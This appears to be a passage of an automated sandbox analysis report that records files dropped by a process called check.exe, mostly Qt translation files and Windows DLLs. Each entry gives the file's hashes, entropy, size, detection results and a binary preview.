                                                                                                                                                                                                            Preview:<.d....!..`.......gd_GBB..2....*...u...+......@.......A...B...B.......C.......D.. ....E.. ....F..!&...G..!J...H..!n...I..!....P..#m...Q..#....R..#....S..$....T..$$...U..$H...V..$....W..$....X..$....Y..%....]../....s...'...t...................F...;.......;../....;..=V...;..G....M../G...O.......O...k......$....}../o.......i...=.......m../....t..........[...(5..M...+;..@...+;..x...+O..:...1...\7..D@...f..E@..#...H4...p..HY..be..H.......IC......J.......J....R..J.......LD......L.......PS......QR..#l..R...g...T.......U.......X....\..Zr......[`......\...&...]x......_....C.._...'t..yg..?...1...BM...E..D.......;.......R'.......t.......@.......?...$..c....[......,...i...y.......y...Y.......f.......+...........9..c....E...............z.."....................%..U....D..................G.....UB.....W......\]...5.......0.......0..<....0...;...0.......5.......5..ij..............h... D..0... D..aC..+....K..<U.....<U...~..<.......H5..0...H5..a...L....1..VE..$...VE..X...V...8|..f...Z...f...=..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):138690
                                                                                                                                                                                                            Entropy (8bit):5.515748942553918
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:XSue8Z7T3iJsqBejt/zNHSLzdetY2ZISfC/S:XSueK3w7Ijt8zUtYAISfC/S
                                                                                                                                                                                                            MD5:DEAF87D45EE87794AB2DC821F250A87A
                                                                                                                                                                                                            SHA1:DB39C6BAA443AA9BB208043EF7FB7E3403C12D90
                                                                                                                                                                                                            SHA-256:E1EBCA16AFE8994356F81CA007FBDB9DDF865842010FE908923D873B687CAD3F
                                                                                                                                                                                                            SHA-512:276FCE81249EFFE19E95607C39F9ACB3A4AFA3F90745DA21B737A03FEA956B079BCA958039978223FD03F75AC270EC16E46095D0C6DDA327366C948EC2D05B9C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......he_ILB../....*......+..Sw...@......A......B.......C.......D...X...E.......F.../...G...O...H...o...I......P.......Q.......R...I...S...i...T......U......V.......W.......X.../...Y...O...]..$....s......t..X:.......4......`Y...;..$....;..%....;.......;...5...;.......M..$....O...6...O..s............}..%-...........=...m...m..%k...t..........^..(5......+;..2...+;..^...+O...N..1.......D@......E@...(..H4..T...HY..L...H..._...IC..\...J...\...J.......J...\j..LD..^...L...^o..PS..fl..QR......R...Q...T...su..U...s...X...x3..Zr..~...[`..L\..\.......]x....._......._....o..yg...(..1...3....E..5C.......z......?V......U.......U.......W....$..M....[..W....,..X....y.......y..\........a..............\@...9..NO...E...?......]s...z...G.......(......^....%..B^...D.._......._.................... ..........5..`/...0.......0...L...0......0..d(...0......5..ek...5..........fB......R... D..&O.. D..K...+...l...<U......<U..p)..<...p...H5..&w..H5..La..L...s...VE......VE......V.....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):160494
                                                                                                                                                                                                            Entropy (8bit):4.831791320613137
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:BmOMZadV9n51xXeQvjOiIzz7/Vs9Db3ihuJNvMfWxBNlYzYbTrIkfwb03l24cNKu:HkWa5pg0MahBHDd
                                                                                                                                                                                                            MD5:E9D302A698B9272BDA41D6DE1D8313FB
                                                                                                                                                                                                            SHA1:BBF35C04177CF290B43F7D2533BE44A15D929D02
                                                                                                                                                                                                            SHA-256:C61B67BB9D1E84F0AB0792B6518FE055414A68E44D0C7BC7C862773800FA8299
                                                                                                                                                                                                            SHA-512:12947B306874CF93ABA64BB46FAC48179C2D055E770D41AF32E50FFFB9F0C092F583AFCEA8B53FE9E238EF9370E9FFFBEB581270DFA1A7CB74EBE54D9BFF459F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu_HUB../....*.......+.......@.......A...0...B...{...C.......D.......E.......F.......G...<...H...`...I.......P...s...Q.......R.......S.......T...*...U...N...V.......W.......X.......Y.......]..+y...s.......t.......................;..+Q...;..,U...;.......;.......;..&....M..+....O.......O...U..........}..+............=.......m..+....t..........9c..(5..,...+;..;...+;..m7..+O......1...9...D@...T..E@......H4...v..HY..Y...H.......IC......J.......J.......J.......LD......L.......PS...}..QR..!...R...]...T.......U....{..X.......Zr...=..[`......\....*..]x...-.._......._......yg...M..1...<....E..>...............J........T.......(.......S...$..Z....[.......,...u...y.......y...[...............#...........9..Z....E..#&...........z..!'...................%..Mv...D..._....................32.....5......9....5.......0...h...0...E...0.......0.......0..#....5...Z...5...........G......_2.. D..,... D..W...+....W..<U......<U...B..<.......H5..,...H5..X{..L....)..VE.."...VE..6l..V....*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):161172
                                                                                                                                                                                                            Entropy (8bit):4.680034416311688
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:eSfxfdO4BKJb0td5pqCOIUP/PFIM7gxGQ9sRrFM6QJ4m8ihkM:eSfxFO4BKJb0td5pnOrvCqg9mRK4IkM
                                                                                                                                                                                                            MD5:88D040696DE3D068F91E0BF000A9EC3E
                                                                                                                                                                                                            SHA1:F978B265E50D14FDDE9693EC96E99B636997B74D
                                                                                                                                                                                                            SHA-256:7C7DC8B45BF4E41FEC60021AB13D9C7655BE007B8123DB8D7537A119EB64A366
                                                                                                                                                                                                            SHA-512:F042637B61C49C91043D73B113545C383BD8D9766FD4ACC21675B4FF727652D50863E72EA811553CB26DF689F692530184A6CE8FE71F9250B5A55662AFE7D923
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it_ITB../....*.......+.......@.......A..."...B...m...C.......D.......E.......F.......G...0...H...T...I...x...P...q...Q.......R.......S.......T...(...U...L...V.......W.......X.......Y.......]..+....s...'...t...................^...;..+[...;..,g...;.......;.......;..!B...M..+....O...D...O...........(...}..+........I...=.......m..,....t..........4...(5..'...+;..<...+;..oV..+O......1...5...D@...F..E@......H4...J..HY..Z...H.......IC...L..J....s..J....j..J.......LD......L....f..PS......QR..!...R..._...T.......U....3..X.......Zr......[`...Q..\.......]x......_......._....0..yg...C..1...=....E..?o..............Kf.......h.......8.......I...$..[....[.......,...m...y...9...y...........z.......z...........9..\=...E..$u.......:...z.. k...................%..N....D..................M............0......5/...5...2...0.......0...0...0...A...0...)...0..$....5.......5...J.......a......a... D..,... D..Y...+.......<U......<U......<....v..H5..-...H5..Z...L.......VE.."c..VE..1...V....X.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):129911
                                                                                                                                                                                                            Entropy (8bit):5.802855391832282
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:W8YYSCjKBJ26c1Z7f25pVmuLXpxfqt7FEUWNrfQje9kWI23pKXvx:xYuKBJ01Z7u5pQuLbESUWNzAAI23pKfx
                                                                                                                                                                                                            MD5:608B80932119D86503CDDCB1CA7F98BA
                                                                                                                                                                                                            SHA1:7F440399ABA23120F40F6F4FCAE966D621A1CC67
                                                                                                                                                                                                            SHA-256:CBA382ACC44D3680D400F2C625DE93D0C4BD72A90102769EDFD1FE91CB9B617B
                                                                                                                                                                                                            SHA-512:424618011A7C06748AADFC2295109D2D916289C81B01C669DA4991499B207B781604A03259C546739A3A6CF2F8F6DFA753B23406B2E2812F5407AEE343B5CBDD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......jaB../....*...'...+..=....@.......A.......B...?...C...c...D......E......F.......G.......H..."...I...F...P.......Q...'...R...r...S......T......U.......V...8...W...\...X......Y......].."k...s...Q...t..A...............I....;.."C...;..#A...;.......;.......;.......M.."....O...B...O..[?......h....}.."........m...=.......m.."....t...........M..(5......+;......+;..WU..+O......1.......D@......E@...K..H4..>=..HY..F...H...Hr..IC..E...J...F...J.......J...E...LD..Gz..L...G...PS..O...QR......R...K!..T...Z...U...[e..X..._f..Zr..e...[`..7...\...i...]x...'.._......._...j...yg..~+..1.../....E..1?.......#......:.......?.......?n......A....$..G....[..Ap...,..B....y.......y..Ew......|...............E....9..H....E..........F....z...]..............HL...%..=R...D..H.......I!......[......J......M..........5..It...0...3...0.......0...C...0..M....0...a...5..N....5..........N.......L6.. D..#... D..E...+...U%..<U......<U..X ..<...X...H5..#...H5..FK..L...[...VE......VE......V......f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):156799
                                                                                                                                                                                                            Entropy (8bit):5.859529082176036
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:rvTy18hhPekHs1iNXVExWbStnn8TExgkYOvYejZOvXx4Mmf0MwUL8smk/pDZyy:y18hJ61nMStnn8TOgknQRLWZmkxNyy
                                                                                                                                                                                                            MD5:082E361CBAC2E3A0849F87B76EF6E121
                                                                                                                                                                                                            SHA1:F10E882762DCD2E60041BDD6CC57598FC3DF4343
                                                                                                                                                                                                            SHA-256:0179ED1B136E1CB3F583351EAA2C545BA3D83A6EE3F82C32505926A1A5F5F183
                                                                                                                                                                                                            SHA-512:F378A42116924E30FA0B8FFF1D3C3CB185DC35B2746DCE2818BE7C2AA95C5DE103DF44AAC74DA969C36C557F1D4DE42AC7647EC41066247F8AD2697BDED667EA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......koB..7....*.......+.......@...K...A...o...B......C.......D...8...E.......F...U...G...y...H......I.......P......Q.......R.......S...C...T...g...U.......V.......W.......X...-...Y...Q...]..$....s...>...t...................y...;..${...;..%....;...u...;...l...M..$....O.......O...8...........}..$............=...C...m..%!...t...n..........(5...a..+;..E@..+;..l|..+O......1.......D@.....E@......H4......HY..\...H....]..IC......J.......J....8..J.......LD...a..L.......PS......QR......R...`...T.......U....^..U.......X....y..Zr......[`..y...\....A..]x......_......._....o..yg......1...FJ...E..HE...7..................Q........a.......5...........$..]....[...;...,.......y.......y...V...............!.......|...9..]....E...R...........z...4.......f.......5...%..Te...D..................D......^.............*...5...S...0.......0.......0.......0.......5.......5...........n......a... D..%... D..[...+.......<?......<U...;..<U...+..<.......H5..&...H5..\...L.......VE......V....A..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153608
                                                                                                                                                                                                            Entropy (8bit):4.843805801051326
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:y5pmbKIhooMbGe91MrjOhmGzP6LJbWz5XIxELpU6:yObeqrjPGzeJyJLy6
                                                                                                                                                                                                            MD5:BD8BDC7BBDB7A80C56DCB61B1108961D
                                                                                                                                                                                                            SHA1:9538C4D8BB9A95C0D9DC57C7708A99DD53A32D1F
                                                                                                                                                                                                            SHA-256:846E047573AE40C83671C3BA7F73E27EFC24B98C82701DA0DF9973E574178BB2
                                                                                                                                                                                                            SHA-512:F040EC410EBFEA21145F944E71ADCAE8E5F60907D1D3716A937A9A59A48F70C6B7EAAC91C2C554F59357A7BC820CDBD17C73A4DECC20B51F68EB79EDD35C5554
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......lv_LVB.......*...B...+..y....@.......A...=...B......C......D.......E.......F...#...G...G...H...k...I.......P...~...Q......R.......S.......T...5...U...Y...V......W.......X.......Y.......]..%....s.......t...8.......n.......A...;..&....;.......;...!...;...A...;../....M..%....O.......O...............}..%...........=.......m..&....t...(......(g..(5...+..+;..4...+;..d...+O......1...(...D@...a..E@......H4..z...HY..Q...H.......IC......J....6..J.......J.......LD......L....9..PS......QR......R...U...T....S..U.......X...._..Zr......[`..r...\.......]x...*.._......._....{..yg......1...5v...E..7........(......B.......|.......|W......~r...$..R....[..~....,.......y...l...y...............................9..S....E...g...........z...z...................%..F....D........................"Z.....$......)....5.......0...\...0.......0...r...0.......0.......5...a...5..........J......V... D..&... D..P...+.......<U......<U......<.......H5..'"..H5..P...L....~..VE...R..VE..%...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):162982
                                                                                                                                                                                                            Entropy (8bit):4.841899887077422
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sXpestp/YIFtDT8FIWYbIJmPYuIpnmxAk6mwyJNqSm9+P:sxpTDT8FIWfJmdCmxApmbnqSm9+P
                                                                                                                                                                                                            MD5:F9475A909A0BAF4B6B7A1937D58293C3
                                                                                                                                                                                                            SHA1:76B97225A11DD1F77CAC6EF144812F91BD8734BD
                                                                                                                                                                                                            SHA-256:CE99032A3B0BF8ABAD758895CC22837088EAD99FD2D2514E2D180693081CFE57
                                                                                                                                                                                                            SHA-512:8A4F1B802B6B81FF25C44251FB4A880E93E9A5FE25E36825A24BFE0EFB34E764E7E1EE585D3A56554964B7921E7813C67F12D200D6E0C5EAF4BB76B064B5C890
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pl_PLB..0....*.."....+.......@...F...A...j...B......C.......D...3...E.......F...P...G...t...H.......I.......P.......Q.......R.......S...>...T...b...U.......V.......W.......X...(...Y...L...]..*....s.......t...r.......o.......+...;..*....;..+....;..."...;... ...M..*....O...6...O...........a...}..+...........=.......m..+G...t...G......,...(5......+;..:...+;..k...+O......1...-[..D@.....E@......H4...U..HY..WU..H.......IC......J....6..J.......J.......LD......L....%..PS......QR.. ...R...[...T....1..U.......X......Zr......[`......\.......]x...A.._......._....}..yg......1...;W...E..=........%......H....................$..Xp...[.......,.......y...i...y...........}......$R...........9..X....E..+)...........z.. E...................%..K....D...p....................&......(......-....5.......0.......0...e...0.......0..+....5...]...5...........f......]-.. D..,%.. D..V?..+....V..<U......<U......<....-..H5..,M..H5..V...L....Z..VE..!...VE..)...V.......f...P...f....K..f......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):203767
                                                                                                                                                                                                            Entropy (8bit):5.362551648909705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:hn4dEJ63pdhPpy6gu5fs4MHQv6sLlxnrncF423ZL9xyuXwdcX8LZuf76CW+WeXFx:aN3pdV5fZbpItXsttRY+WSq
                                                                                                                                                                                                            MD5:5096AD2743BF89A334FBA6A2964300D4
                                                                                                                                                                                                            SHA1:405F45361A537C7923C240D51B0FF1C46621C203
                                                                                                                                                                                                            SHA-256:3DA6605668F9178D11A838C4515478084DCFB4F9CF22F99D7A92B492DB9C224B
                                                                                                                                                                                                            SHA-512:7B88B501792B5831426BAA669138192ED94CC3F8323A3DF9D5287655DC4D877706908C517AB7523AE8A283BF50B47123F13B8AE40EA2F3081C3459EDC47FC8DD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ru_RUB..7....*...L...+...W...@..,....A..,....B..-1...C..-U...D..-....E...r...F.......G.......H../....I../8...P..1'...Q..1K...R..1....S..1....T..1....U..2....V..2\...W..2....X..2....Y..2....].......s..$c...t...'......%........r...;..-....;.......;..J....;..V....M...C...O.......O..&.......8....}...m......+3...=..+....m.......t..+.......p...(5..]@..+;..[0..+;......+O..H...1...qM..D@..-...E@..1o..H4...p..HY..xm..H....*..IC...@..J....g..J.......J.......LD......L....p..PS......QR..!...R...}...T...&...U...'...U...ki..X...+...Zr..3...[`......\...:...]x..)..._......._...;...yg..S...1...\....E..__...7.........H.......k................j.......U...$..y....[.......,.......y...k...y...............................9..y....E...O...........z..!*...................%..nW...D.................%w.....g......j~.....qw...5...H...0.......0..I....0..._...0......5.......5..................~... D../k.. D..wa..+....?..<?.."t..<U......<U.."...<...#z..H5../...H5..w...L...&...VE.."...V...F$.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):125763
                                                                                                                                                                                                            Entropy (8bit):4.80343609423322
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:roXDuC1u/2lUBGjJirE5tsd/aev1GIfOdvhw:OucMGjH5tbm
                                                                                                                                                                                                            MD5:3D60E50DCBCBD70EE699BC9B1524FCB9
                                                                                                                                                                                                            SHA1:0211B4911B5B74CC1A46C0FCA87D3BF5632AA44A
                                                                                                                                                                                                            SHA-256:D586AE2C314074CF398417FDECB40709D5478DFEB0A67C2FE60D509EE9B59ED7
                                                                                                                                                                                                            SHA-512:F98211867F1DBCB8A342C00E23FA5718BE6E999F7449CB8470B41BF0F527C7F78CC4D6666E28968F32E96026907156753979BFADA7E6BF4225D02A902D24906D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk_SKB..$x...*.......+..>....@......A......B.......C.......D...3...E...Z...F......G......H.......I.......P.......Q...D...R.......S......T.......U.......V...1...W...X...X.......Y......]...Y...t..D-......K....;...3...;.......;.......;......;...V...M.......O.._ ......l....}.......m...........T..(5...(..+;......+;..%...+O......1......E@...k..F.......H4..?I..HY..@7..H...J...I....,..IC..HT..J...H{..J...H...LD..J"..L...Jv..PS..Q...R...D...Zr..i]..[`..7...\...nB.._...o...1...&....E..(........B......19......A.......A....$..AF...[..C....,..D....y..G.......v........g......G....9..A....E..........IH...%..4.......Kf..............................5..K....0...,...0.......0.......0..Of...0.......5..P....5..........E... D...C.. D..?'..+...Y`..<U......<U..\...<...]...H5...m..H5..?...L...^...VE......f.......f...8...g.......l...aP.......................6......d....D..f(...`..f...............?....`..h5...y..H....5..j........E...e.......e..@....... ......>......oZ......l..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):194487
                                                                                                                                                                                                            Entropy (8bit):4.877239354585035
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:yRRhAFCvqDBitD/iDG9AOH+l4TcwZBPqHo9fd9CFRK+2IKAimxsjucV2p0ZqvRu7:yRRHs5mksWVX3lA3
                                                                                                                                                                                                            MD5:6CBC5D8E1EABEC96C281065ECC51E35E
                                                                                                                                                                                                            SHA1:4E1E6BA3772428227CB033747006B4887E5D9AD1
                                                                                                                                                                                                            SHA-256:6A0BF6E70E7920C2B193E76E92F78F315936955D3B06AC039D917F2E06C43281
                                                                                                                                                                                                            SHA-512:CE1F9EE180176153D5F523D71E0DB06F4DEA65C24E5E2CD56341CFAEE349A8E9A0F606D99F7219A35DD4516D1528C90AEA4BB87548A55392B8F2B36164D478B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr_TRB..7....*.......+...-...@.......A.......B.......C...%...D.......E...F...F.......G.......H.......I.......P.. ....Q.. ....R..!D...S..!h...T..!....U..!....V.."....W.."0...X.."T...Y.."x...]..,g...s.../...t......................;..,9...;..-I...;..9@...;..E....M..,....O.......O...G...........}..,............=...\...m..,....t.........._3..(5..LJ..+;..Wt..+;...\..+O..7...1..._...D@......E@..!...H4...@..HY..t...H....2..IC...r..J......J....D..J....K..LD...$..L....x..PS......QR..!...R...x...T.......U....q..U...Y...X...."..Zr...%..[`......\....:..]x......_......._.......yg..6...1...X....E..[....7...Z......7Q......f............................$..u....[...:...,...5...y.......y...........7...............!...9..u....E...........P...z.. ........p...........%..j....D..................A.....U......Y......_....5...V...0.......0..8....0...U...0.......5.......5..~b..............z+.. D..-... D..s...+.......<?...8..<U...s..<U...p..<.......H5..-...H5..s...L.......VE.."0..V...4..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):158274
                                                                                                                                                                                                            Entropy (8bit):5.402056706327934
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:jXwjFVUDdMUD4TzdAhpQgO5poZHvJllEnhmdK4I77/dnPJX/imfb1jhvv3BxT8ue:jBzD4Tzaw5pCvJ8hVPdlvj3p8
                                                                                                                                                                                                            MD5:D6234E4E21021102B021744D5FA22346
                                                                                                                                                                                                            SHA1:63A14327D0CF0941D6D6B58BFA7E8B10337F557B
                                                                                                                                                                                                            SHA-256:51B8FF55B37DC5907D637A8DDDA12FBE816852B0244C74EB4F0FB84867A786E0
                                                                                                                                                                                                            SHA-512:37D24A092C5F29BACB7A4CA8207C4EEFD0F073B7E74A492402867F758084091BF1D79D2BA2B4A28B35FEF42E8023C371FDE97578F74BB2033551154E77102DE6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk_UAB../....*...E...+...l...@.......A.......B...G...C...k...D.......E.......F.......G.......H...*...I...N...P...=...Q...a...R.......S.......T.......U.......V...r...W.......X.......Y.......]..*y...s.......t...........;.......n...;..*Q...;..+U...;.......;...x...;..!(...M..*....O.......O...........6...}..*........E...=.......m..*....t..........3...(5..&...+;..:...+;..k0..+O...A..1...4-..D@... ..E@......H4...8..HY..W...H....2..IC...V..J....}..J.......J....%..LD...&..L....z..PS......QR.. ...R...\...T....(..U.......X.......Zr......[`..~...\.......]x......_......._....4..yg...c..1...;....E..=w.......m......I............................$..X....[...<...,.......y.......y...........M...................9..Y....E...F.......D...z.. ........P...........%..LB...D.......................-n...../......4W...5...F...0...p...0...W...0.......0...k...0.......5.......5..................^... D..+... D..V...+.......<U.../..<U......<....>..H5..+...H5..V...L....S..VE..!...VE..0...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):127849
                                                                                                                                                                                                            Entropy (8bit):5.83455389078597
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:Fv2cHP10gOs6dcFxsJopMqOWv2WIrPFP8pa:Fh6s6iFxEodjef8pa
                                                                                                                                                                                                            MD5:9C6A3721D01ECAF3F952CE96F46CE046
                                                                                                                                                                                                            SHA1:4A944E9E31DF778F7012D8E4A66497583BFD2118
                                                                                                                                                                                                            SHA-256:085D29EAF9BBB788B2F2503D74A1EF963A9411CEB600441254CE49A120E1AB63
                                                                                                                                                                                                            SHA-512:6E2807B8785F42A26C9CCBDBA0327DD40B529B10C468593F0E74113774D1CCDAA4FD9ACE9B259B9040E1475911428ECAEA49425B0F170862CF8147D23DB48E46
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TWB..2x...*.......+..)....@.......A.......B...j...C......D.......E......F.......G...)...H...M...I...q...P...%...Q...I...R......S......T.......U.......V...Z...W...~...X......Y.......]..!....s.......t..-...............4....;..!z...;.."|...;.......;.......M..!....O.......O..Ay......N)...}..!............=.......m.." ...t...(.........(5......+;..;...+;.._...+O......1.......D@...C..E@...m..H4..*W..HY..Pm..H...3...IC..1...J...1...J.......J...1...LD..2...L...38..PS..6...QR...T..R...T...T...A...U...A...X...E...Zr..K...[`..$...\...OW..]x......_......._...P...yg..a^..1...<....E..>....7...>.......;......Fo......+.......+.......-L...$..QR...[..-....,...F...y.......y..1J...............6......1p...9..Q....E..........2....z...........<......3....%..H....D..4W......4}....................Z...... ...5..4....0...?...0...K...0..5....0...L...5..6....5..........6.......U... D.."... D..O...+...<%..<U......<U..>...<...?:..H5..#...H5..O...L...AS..VE...M..VE......V.......f...L..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2483712
                                                                                                                                                                                                            Entropy (8bit):6.241719144701645
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:ZYS8YHrNj4/7RsRLvYpiW3pCBU+Z7bJWvCSBYgbxGJ5M2GM/fXR1fUdihfSbCo6e:9bpj4/7RsRLvYpiW3pCBU+Z7bJWvCSBv
                                                                                                                                                                                                            MD5:678FA1496FFDEA3A530FA146DEDCDBCC
                                                                                                                                                                                                            SHA1:C80D8F1DE8AE06ECF5750C83D879D2DCC2D6A4F8
                                                                                                                                                                                                            SHA-256:D6E45FD8C3B3F93F52C4D1B6F9E3EE220454A73F80F65F3D70504BD55415EA37
                                                                                                                                                                                                            SHA-512:8D9E3FA49FB42F844D8DF241786EA9C0F55E546D373FF07E8C89AAC4F3027C62EC1BD0C9C639AFEABC034CC39E424B21DA55A1609C9F95397A66D5F0D834E88E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.........../....td./..../...td./...td./...td./...n../...1../......P...c./....c./....c./...Rich...........................PE..d....p.f.........." ...(.*...........+.......................................0&...........`.............................................L.....................#.$.............%.... t.......................t..(....r..@............@..(o...........................text...~(.......*.................. ..`.rdata..x....@......................@..@.data...h...........................@....pdata..$.....#......n#.............@..@.reloc.......%......L%.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2494976
                                                                                                                                                                                                            Entropy (8bit):6.232020603277999
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:SUjOoTFrwI8nc6EmRAQ9RzgpP2bXYUKuXeLQp5PjYq0zb:SUqCgnZXRAQ9RzggbozJLQp5Mq
                                                                                                                                                                                                            MD5:AE182C36F5839BADDC9DCB71192CFA7A
                                                                                                                                                                                                            SHA1:C9FA448981BA61343C7D7DECACAE300CAD416957
                                                                                                                                                                                                            SHA-256:A9408E3B15FF3030F0E9ACB3429000D253D3BB7206F750091A7130325F6D0D72
                                                                                                                                                                                                            SHA-512:8950244D828C5EDE5C3934CFE2EE229BE19CC00FBF0C4A7CCEBEC19E8641345EF5FD028511C5428E1E21CE5491A3F74FB0175B03DA17588DAEF918E3F66B206A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......... j..sj..sj..sc..sn..s.p.rh..s1..rh..s.p.ri..s.p.rb..s.p.r...s...rh..s..ro..sj..s...syw.ra..syw.rk..syw.rk..sRichj..s........PE..d....p.f.........." ...(.....................................................P&...........`.........................................`&..L....&................$...............%.....................................p...@...............@{...........................text...O........................... ..`.rdata..............................@..@.data...xz.......^...t..............@....pdata........$.......#.............@..@.reloc........%......^%.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5144576
                                                                                                                                                                                                            Entropy (8bit):6.262739223310643
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:Qi+reIG7QwktsFPKoe2yicbbqgkcY9abW7KnTYK2bjMkTDGM7y:uqT7Q1kyTvoWW7EYvM9M
                                                                                                                                                                                                            MD5:E8C3BFBC19378E541F5F569E2023B7AA
                                                                                                                                                                                                            SHA1:ACA007030C1CEE45CBC692ADCB8BCB29665792BA
                                                                                                                                                                                                            SHA-256:A1E97A2AB434C6AE5E56491C60172E59CDCCE42960734E8BDF5D851B79361071
